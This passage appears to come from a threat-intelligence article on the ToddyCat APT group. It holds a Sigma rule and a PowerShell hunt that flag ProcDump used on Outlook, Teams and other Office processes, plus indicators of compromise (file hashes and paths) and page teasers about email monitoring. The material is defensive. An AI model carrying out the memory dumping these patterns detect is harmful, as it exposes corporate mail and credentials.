status: experimental
description: Detects Office 365 process names in the command line of the procdump tool
author: kaspersky
date: 2025-08-11
tags:
    - attack.lateral-movement
    - attack.defense-evasion
    - attack.t1550.001
logsource:
  category: process_creation
  product: windows
detection:
    selection:
        Product: 'ProcDump'
        CommandLine|contains:
            - 'teams'
            - 'winword'
            - 'onenote'
            - 'powerpnt'
            - 'outlook'
            - 'excel'
            - 'onedrive'
            - 'sharepoint'
    condition: selection
falsepositives: Legitimate activity
level: high
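The same logic can be expressed as an ad-hoc PowerShell hunt. The sketch below is illustrative only and assumes process-creation auditing with command-line logging is enabled (Event ID 4688 plus the “Include command line in process creation events” policy); it looks for procdump invocations that reference any Microsoft 365 process name.

# Illustrative only. Requires 4688 auditing with command-line logging enabled.
$officeNames = 'teams|winword|onenote|powerpnt|outlook|excel|onedrive|sharepoint'
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -ErrorAction SilentlyContinue |
    Where-Object {
        $_.Message -match 'procdump' -and
        $_.Message -match $officeNames
    } |
    Select-Object TimeCreated, Message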

Below is an example of the ProcDump tool from the Sysinternals package used to dump the Outlook process memory, detected by Kaspersky Anti Targeted Attack (KATA).

Example of Outlook process dump detection in KATA

Takeaways

The incidents reviewed in this article show that ToddyCat APT is constantly evolving its techniques and seeking new ways to conceal its activity aimed at gaining access to corporate correspondence within compromised infrastructure. Most of the techniques described here can be successfully detected. For timely identification of these techniques, we recommend using both host-based EPP solutions, such as Kaspersky Endpoint Security for Business, and complex threat monitoring systems, such as Kaspersky Anti Targeted Attack. For comprehensive, up-to-date information on threats and corresponding detection rules, we recommend Kaspersky Threat Intelligence.

Indicators of compromise

Malicious files
55092E1DEA3834ABDE5367D79E50079A    ip445.ps1
2320377D4F68081DA7F39F9AF83F04A2    xCopy.exe
B9FDAD18186F363C3665A6F54D51D3A0    stf.exe

Not-a-virus files
49584BD915DD322C3D84F2794BB3B950             XstExport.exe

File paths
C:\programdata\ip445.ps1
C:\Windows\Temp\xCopy.exe
C:\Windows\Temp\XstExport.exe
c:\windows\temp\stf.exe

PDB
O:\Projects\Penetration\Tools\SectorCopy\Release\SectorCopy.pdb

How to Monitor Your Email Services

Verifying email performance is more than the basic understanding of message flow. Outbound mail in the form of Simple Mail Transfer Protocol (SMTP) and inbound mail through MAPI or Microsoft’s Graph API are only parts of email systems to monitor, usually through pings or basic delivery confirmations. Often, once email is moved to Exchange Online, even…


Microsoft Outlook Outage on 6th February EX512238

Unable to send, receive, or search email through Exchange Online? Microsoft Outlook suffered an outage for several hours last night, disrupting email services in North America and worldwide. Proactive and Early Outage Detection Exoprise sensors first detected and confirmed the outage at 11:03 pm in our London region last night. There was a second outage at…

